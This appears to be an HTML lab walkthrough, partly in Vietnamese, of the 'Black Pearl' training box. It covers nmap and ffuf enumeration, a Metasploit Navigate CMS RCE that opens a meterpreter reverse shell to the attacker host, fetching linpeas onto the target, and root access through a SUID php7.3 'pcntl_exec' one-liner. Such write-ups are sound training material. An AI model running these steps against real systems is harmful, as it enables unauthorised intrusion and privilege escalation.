
    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Black Pearl TCM - writeup</title>
        <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet">
        <link href="https://cdn.jsdelivr.net/npm/lightgallery.js/dist/css/lightgallery.min.css" rel="stylesheet">
        <link href="https://cdn.jsdelivr.net/npm/lg-thumbnail.js/dist/lg-thumbnail.min.css" rel="stylesheet">
        <!-- Add Pygments CSS for code highlighting -->
        <style>pre { line-height: 125%; }
td.linenos .normal { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }
span.linenos { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }
td.linenos .special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
span.linenos.special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
.highlight .hll { background-color: #ffffcc }
.highlight { background: #f8f8f8; }
.highlight .c { color: #3D7B7B; font-style: italic } /* Comment */
.highlight .err { border: 1px solid #FF0000 } /* Error */
.highlight .k { color: #008000; font-weight: bold } /* Keyword */
.highlight .o { color: #666666 } /* Operator */
.highlight .ch { color: #3D7B7B; font-style: italic } /* Comment.Hashbang */
.highlight .cm { color: #3D7B7B; font-style: italic } /* Comment.Multiline */
.highlight .cp { color: #9C6500 } /* Comment.Preproc */
.highlight .cpf { color: #3D7B7B; font-style: italic } /* Comment.PreprocFile */
.highlight .c1 { color: #3D7B7B; font-style: italic } /* Comment.Single */
.highlight .cs { color: #3D7B7B; font-style: italic } /* Comment.Special */
.highlight .gd { color: #A00000 } /* Generic.Deleted */
.highlight .ge { font-style: italic } /* Generic.Emph */
.highlight .gr { color: #E40000 } /* Generic.Error */
.highlight .gh { color: #000080; font-weight: bold } /* Generic.Heading */
.highlight .gi { color: #008400 } /* Generic.Inserted */
.highlight .go { color: #717171 } /* Generic.Output */
.highlight .gp { color: #000080; font-weight: bold } /* Generic.Prompt */
.highlight .gs { font-weight: bold } /* Generic.Strong */
.highlight .gu { color: #800080; font-weight: bold } /* Generic.Subheading */
.highlight .gt { color: #0044DD } /* Generic.Traceback */
.highlight .kc { color: #008000; font-weight: bold } /* Keyword.Constant */
.highlight .kd { color: #008000; font-weight: bold } /* Keyword.Declaration */
.highlight .kn { color: #008000; font-weight: bold } /* Keyword.Namespace */
.highlight .kp { color: #008000 } /* Keyword.Pseudo */
.highlight .kr { color: #008000; font-weight: bold } /* Keyword.Reserved */
.highlight .kt { color: #B00040 } /* Keyword.Type */
.highlight .m { color: #666666 } /* Literal.Number */
.highlight .s { color: #BA2121 } /* Literal.String */
.highlight .na { color: #687822 } /* Name.Attribute */
.highlight .nb { color: #008000 } /* Name.Builtin */
.highlight .nc { color: #0000FF; font-weight: bold } /* Name.Class */
.highlight .no { color: #880000 } /* Name.Constant */
.highlight .nd { color: #AA22FF } /* Name.Decorator */
.highlight .ni { color: #717171; font-weight: bold } /* Name.Entity */
.highlight .ne { color: #CB3F38; font-weight: bold } /* Name.Exception */
.highlight .nf { color: #0000FF } /* Name.Function */
.highlight .nl { color: #767600 } /* Name.Label */
.highlight .nn { color: #0000FF; font-weight: bold } /* Name.Namespace */
.highlight .nt { color: #008000; font-weight: bold } /* Name.Tag */
.highlight .nv { color: #19177C } /* Name.Variable */
.highlight .ow { color: #AA22FF; font-weight: bold } /* Operator.Word */
.highlight .w { color: #bbbbbb } /* Text.Whitespace */
.highlight .mb { color: #666666 } /* Literal.Number.Bin */
.highlight .mf { color: #666666 } /* Literal.Number.Float */
.highlight .mh { color: #666666 } /* Literal.Number.Hex */
.highlight .mi { color: #666666 } /* Literal.Number.Integer */
.highlight .mo { color: #666666 } /* Literal.Number.Oct */
.highlight .sa { color: #BA2121 } /* Literal.String.Affix */
.highlight .sb { color: #BA2121 } /* Literal.String.Backtick */
.highlight .sc { color: #BA2121 } /* Literal.String.Char */
.highlight .dl { color: #BA2121 } /* Literal.String.Delimiter */
.highlight .sd { color: #BA2121; font-style: italic } /* Literal.String.Doc */
.highlight .s2 { color: #BA2121 } /* Literal.String.Double */
.highlight .se { color: #AA5D1F; font-weight: bold } /* Literal.String.Escape */
.highlight .sh { color: #BA2121 } /* Literal.String.Heredoc */
.highlight .si { color: #A45A77; font-weight: bold } /* Literal.String.Interpol */
.highlight .sx { color: #008000 } /* Literal.String.Other */
.highlight .sr { color: #A45A77 } /* Literal.String.Regex */
.highlight .s1 { color: #BA2121 } /* Literal.String.Single */
.highlight .ss { color: #19177C } /* Literal.String.Symbol */
.highlight .bp { color: #008000 } /* Name.Builtin.Pseudo */
.highlight .fm { color: #0000FF } /* Name.Function.Magic */
.highlight .vc { color: #19177C } /* Name.Variable.Class */
.highlight .vg { color: #19177C } /* Name.Variable.Global */
.highlight .vi { color: #19177C } /* Name.Variable.Instance */
.highlight .vm { color: #19177C } /* Name.Variable.Magic */
.highlight .il { color: #666666 } /* Literal.Number.Integer.Long */</style>
        <style>
            /* Center the HTML file on the screen */
            body {
                display: flex;
                justify-content: center;
                align-items: center;
                height: 100vh;
                padding-top: 30px;
            }
            /* Make the display width of the HTML file smaller */
            .container {
                max-width: 42vw;
                margin: 0 auto;
                height: 100%
            }
            
            img {
                width: 80%;
            }
        </style>
        <script src="https://cdn.jsdelivr.net/npm/lightgallery.js/dist/js/lightgallery.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-thumbnail.js/dist/lg-thumbnail.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-zoom.js/dist/lg-zoom.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-fullscreen.js/dist/lg-fullscreen.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-share.js/dist/lg-share.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-autoplay.js/dist/lg-autoplay.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-rotate.js/dist/lg-rotate.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-flip.js/dist/lg-flip.min.js"></script>
        <script>
            window.onload = function() {
                const images = document.getElementsByTagName('img');
                const lightGalleryItems = [];
                for (let i = 0; i < images.length; i++) {
                    const img = images[i];
                    if (img.naturalWidth > 1000) {
                        if (window.innerWidth > 768) {
                            img.style.width = '110%';
                            img.style.transform = 'translateX(-4%)';
                        } else {
                            img.style.width = '100%';
                            img.style.transform = 'none';
                        }
                    }
                    lightGalleryItems.push({ src: img.src, thumb: img.src });
                    img.setAttribute('data-lg-idx', i);
                    img.addEventListener('click', function() {
                        lightGallery(img, {
                            dynamic: true,
                            dynamicEl: lightGalleryItems,
                            index: parseInt(img.getAttribute('data-lg-idx'))
                        });
                    });
                }
            };
        </script>
    </head>
    <body>
        <div class="container">
            <div class="row">
                <div class="col">
                    <h1 style="text-align:center; text-transform:uppercase; font-family: 'Playfair Display', serif; font-weight:700;"">Black Pearl</h1>

<p>Tuesday, August 2, 2022</p>
<p>11:00 PM</p>
<p>nmap -A -p- -T4 192.168.1.11</p>
<p>Starting Nmap 7.92 (  ) at 2022-08-02 23:55 EDT</p>
<p>Nmap scan report for 192.168.1.11</p>
<p>Host is up (0.0023s latency).</p>
<p>Not shown: 65532 closed tcp ports (conn-refused)</p>
<p>PORT   STATE SERVICE VERSION</p>
<p>22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)</p>
<p>| ssh-hostkey:</p>
<p>|   2048 66:38:14:50:ae:7d:ab:39:72:bf:41:9c:39:25:1a:0f (RSA)</p>
<p>|   256 a6:2e:77:71:c6:49:6f:d5:73:e9:22:7d:8b:1c:a9:c6 (ECDSA)</p>
<p>|_  256 89:0b:73:c1:53:c8:e1:88:5e:c3:16:de:d1:e5:26:0d (ED25519)</p>
<p>53/tcp open  domain  ISC BIND 9.11.5-P4-5.1+deb10u5 (Debian Linux)</p>
<p>| dns-nsid:</p>
<p>|_  bind.version: 9.11.5-P4-5.1+deb10u5-Debian</p>
<p>80/tcp open  http    nginx 1.14.2</p>
<p>|_http-title: Welcome to nginx!</p>
<p>|_http-server-header: nginx/1.14.2</p>
<p>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</p>
<p>Service detection performed. Please report any incorrect results at  .</p>
<p>Nmap done: 1 IP address (1 host up) scanned in 18.72 seconds</p>
<p>ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u</p>
<p>secret                  [Status: 200, Size: 209, Words: 31, Lines: 9, Duration: 43ms]</p>
<p>down file secret thì không có thêm thông tin gì</p>
<p>dnsrecon -r 127.0.0/24 -n 192.168.1.11 -d blah</p>
<p>[*] Performing Reverse Lookup from 127.0.0.0 to 127.0.0.255</p>
<p>[+]      PTR blackpearl.tcm 127.0.0.1</p>
<p>[+] 1 Records Found</p>
<p>thêm vhost vào /etc/hosts</p>
<p>ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u</p>
<p>navigate                [Status: 301, Size: 185, Words: 6, Lines: 8, Duration: 68ms]</p>
<p>vào link navigate thì biết được web dùng navigate cms</p>
<p>msfconsole -q</p>
<p>msf6 &gt; search navigate cms</p>
<p>Matching Modules</p>
<p>================</p>
<h1>Name                                 Disclosure Date  Rank       Check  Description</h1>
<ul>
<li>----                                 ---------------  ----       -----  -----------</li>
</ul>
<p>0  exploit/multi/http/navigate_cms_rce  2018-09-26       excellent  Yes    Navigate CMS Unauthenticated Remote Code Execution</p>
<p>Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/navigate_cms_rce</p>
<p>msf6 &gt; use 0</p>
<p>[*] No payload configured, defaulting to php/meterpreter/reverse_tcp</p>
<p>msf6 exploit(multi/http/navigate_cms_rce) &gt; options</p>
<p>Module options (exploit/multi/http/navigate_cms_rce):</p>
<p>Name       Current Setting  Required  Description</p>
<p>----       ---------------  --------  -----------</p>
<p>Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]</p>
<p>RHOSTS                      yes       The target host(s), see</p>
<p>ki/Using-Metasploit</p>
<p>RPORT      80               yes       The target port (TCP)</p>
<p>SSL        false            no        Negotiate SSL/TLS for outgoing connections</p>
<p>TARGETURI  /navigate/       yes       Base Navigate CMS directory path</p>
<p>VHOST                       no        HTTP server virtual host</p>
<p>Payload options (php/meterpreter/reverse_tcp):</p>
<p>Name   Current Setting  Required  Description</p>
<p>----   ---------------  --------  -----------</p>
<p>LHOST  192.168.1.6      yes       The listen address (an interface may be specified)</p>
<p>LPORT  4444             yes       The listen port</p>
<p>Exploit target:</p>
<p>Id  Name</p>
<hr />
<p>0   Automatic</p>
<p>msf6 exploit(multi/http/navigate_cms_rce) &gt; set RHOSTS 192.168.1.11</p>
<p>RHOSTS =&gt; 192.168.1.11</p>
<p>msf6 exploit(multi/http/navigate_cms_rce) &gt; set VHOST blackpearl.tcm</p>
<p>VHOST =&gt; blackpearl.tcm</p>
<p>msf6 exploit(multi/http/navigate_cms_rce) &gt; run</p>
<p>[*] Started reverse TCP handler on 192.168.1.6:4444</p>
<p>[+] Login bypass successful</p>
<p>[+] Upload successful</p>
<p>[*] Triggering payload...</p>
<p>[*] Sending stage (39860 bytes) to 192.168.1.11</p>
<p>[*] Meterpreter session 1 opened (192.168.1.6:4444 -&gt; 192.168.1.11:55604 ) at 2022-08-03 02:48:34 -0400</p>
<p>meterpreter &gt; shell</p>
<p>Process 1366 created.</p>
<p>Channel 1 created.</p>
<p>whoami</p>
<p>www-data</p>
<p>python -c 'import pty;pty.spawn("/bin/bash")'</p>
<p>www-data@blackpearl:~/blackpearl.tcm/navigate$ sudo -l</p>
<p>sudo -l</p>
<p>bash: sudo: command not found</p>
<p>Không có quyền sudo, sử dụng linpeas để enum</p>
<p>www-data@blackpearl:~/blackpearl.tcm/navigate$ wget</p>
<p>www-data@blackpearl:~/blackpearl.tcm/navigate$ ./linpeas.sh</p>
<p>SUID - Check easy privesc, exploits and write perms</p>
<p>╚</p>
<p>strings Not Found</p>
<p>strace Not Found</p>
<p>-rwsr-xr-- 1 root messagebus 50K Jul  5  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper</p>
<p>-rwsr-xr-x 1 root root 10K Mar 28  2017 /usr/lib/eject/dmcrypt-get-device</p>
<p>-rwsr-xr-x 1 root root 427K Jan 31  2020 /usr/lib/openssh/ssh-keysign</p>
<p>-rwsr-xr-x 1 root root 35K Jan 10  2019 /usr/bin/umount  ---&gt;  BSD/Linux(08-1996)</p>
<p>-rwsr-xr-x 1 root root 44K Jul 27  2018 /usr/bin/newgrp  ---&gt;  HP-UX_10.20</p>
<p>-rwsr-xr-x 1 root root 51K Jan 10  2019 /usr/bin/mount  ---&gt;  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8</p>
<p>-rwsr-xr-x 1 root root 4.6M Feb 13  2021 /usr/bin/php7.3 (Unknown SUID binary!)</p>
<p>-rwsr-xr-x 1 root root 63K Jan 10  2019 /usr/bin/su</p>
<p>-rwsr-xr-x 1 root root 53K Jul 27  2018 /usr/bin/chfn  ---&gt;  SuSE_9.3/10</p>
<p>-rwsr-xr-x 1 root root 63K Jul 27  2018 /usr/bin/passwd  ---&gt;  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)</p>
<p>-rwsr-xr-x 1 root root 44K Jul 27  2018 /usr/bin/chsh</p>
<p>-rwsr-xr-x 1 root root 83K Jul 27  2018 /usr/bin/gpasswd</p>
<p>Hoặc dùng lệnh để kiểm tra suid</p>
<p>www-data@blackpearl:~/blackpearl.tcm/navigate$ find / -type f -perm /4000 2&gt;/dev/null</p>
<p><cm/navigate$ find / -type f -perm /4000 2>/dev/null</p>
<p>/usr/lib/dbus-1.0/dbus-daemon-launch-helper</p>
<p>/usr/lib/eject/dmcrypt-get-device</p>
<p>/usr/lib/openssh/ssh-keysign</p>
<p>/usr/bin/umount</p>
<p>/usr/bin/newgrp</p>
<p>/usr/bin/mount</p>
<p>/usr/bin/php7.3</p>
<p>/usr/bin/su</p>
<p>/usr/bin/chfn</p>
<p>/usr/bin/passwd</p>
<p>/usr/bin/chsh</p>
<p>/usr/bin/gpasswd</p>
<p>Dùng gtfobins để tra cứu suid</p>
<p>phần suid có lệnh tham khảo như sau</p>
<p>sudo install -m =xs $(which php) .</p>
<p>CMD="/bin/sh"</p>
<p>./php -r "pcntl_exec('/bin/sh', ['-p']);"</p>
<p>Ta chỉnh lại đường dẫn php thành như sau:</p>
<p>www-data@blackpearl:~/blackpearl.tcm/navigate$ /usr/bin/php7.3 -r "pcntl_exec('/bin/sh', ['-p']);"</p>
<p>&lt;/usr/bin/php7.3 -r "pcntl_exec('/bin/sh', ['-p']);"</p>
<h1>whoami</h1>
<p>root</p>
<h1>cd root</h1>
<h1>ls</h1>
<p>flag.txt</p>
<h1>cat flag.txt</h1>
<p>Good job on this one.</p>
<p>Finding the domain name may have been a little guessy,</p>
<p>but the goal of this box is mainly to teach about Virtual Host Routing which is used in a lot of CTF.</p>
                </div>
            </div>
        </div>    
    </body>
    </html>
    <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
<style>

.copy-button {
  position: absolute;
  right: 5px ;
  top: 5px;
  border: transparent;
  background-color: transparent;
  padding: 2px 6px;
  cursor: pointer;
  font-size: 14px;
  color: #333;
  border-radius: 8px;

}

.copy-button:hover {
  background-color: #30363d; # Change this to a different color to create a hover effect
}
.material-icons{
  line-height:1.3;
  color: #7d8590;
}

pre {
  position: relative;
  # padding: 20px;
  border: 1px solid #e7ee7;
  overflow-x: auto; # Remove this line to disable horizontal scrolling
  font-size: 14px;
  line-height: 1.5;
  border-radius: 6px;
  margin-bottom: 20px;

  # Add these lines to set a fixed width for the code block and wrap long lines
  #width: 80%;
  white-space: pre-wrap; 
}

pre code {
  display: block;
  border-radius: 8px;
  background-color: #2d2d2d; # Change this to a different color to match the copy button background

}




@media only screen and (min-width: 280px) {
  img {
    width: 85%; /* Make image smaller on tablets and mobiles */
  }
}

@media only screen and (max-width: 768px) {
  img {
    width: 85%; /* Make image smaller on tablets and desktops */
  }
}

# @media (min-width: 576px) {
#   img {
#     max-width: 540px;
#   }
# }

# @media (min-width: 768px) {
#   img {
#     max-width: 720px;
#   }
# }



@media (min-width: 280px) {
  .container {
    max-width: 90%;
    margin: 0 auto;
    height: 100%;
  }
}

@media (min-width: 750px) {
  .container {
    max-width: 80%;
    margin: 0 auto;
    height: 100%;
  }
}



@media (min-width: 912px) {
  .container {
    max-width: 70%;
    margin: 0 auto;
    height: 100%;
  }
}

# @media (min-width: 1200px) {
#   .container {
#     max-width: 70%;
#     margin: 0 auto;
#     height: 100%;
#   }
# }

# @media (min-width: 576px) {
#   .container {
#     max-width: 540px;
#   }
# }

# @media (min-width: 768px) {
#   .container {
#     max-width: 620px;
#     margin: 0;
#   }
# }

# @media (min-width: 992px) {
#   .container {
#     max-width: 760px;
#   }
# }

@media (min-width: 1200px) {
  .container {
    max-width: 735px;
    margin: 0;
    height: 100%;
  }
}

# p { 
#   text-indent: 10px;
# }

h2 {
  font-size: 1.5rem;
}

h3 {
  font-size: 1.3rem;
}

# .container {
#   max-width: 100%; /* Set the container width to 100% */
#   padding-left: 15px; /* Add some padding to the left */
#   padding-right: 15px; /* Add some padding to the right */
# }


</style>
<script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/10.7.2/highlight.min.js"></script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.8.0/styles/atom-one-dark-reasonable.min.css">

<script>
  document.addEventListener('DOMContentLoaded', function() {
    var codeBlocks = document.querySelectorAll('pre code');
    codeBlocks.forEach(function(codeBlock) {
      var copyButton = document.createElement('button');
      copyButton.innerHTML = '<i class="material-icons">content_copy</i>';
      copyButton.classList.add('copy-button');
      codeBlock.parentNode.insertBefore(copyButton, codeBlock);

      copyButton.addEventListener('click', function() {
        var code = codeBlock.textContent;
        var textarea = document.createElement('textarea');
        textarea.textContent = code;
        document.body.appendChild(textarea);
        textarea.select();
        document.execCommand('copy');
        textarea.remove();
        copyButton.innerHTML = '<i class="material-icons">check</i>';
        setTimeout(function() {
          copyButton.innerHTML = '<i class="material-icons">content_copy</i>';
        }, 2000);
      });
    });

    // Initialize highlight.js for syntax highlighting
    hljs.initHighlightingOnLoad();
  });
</script>
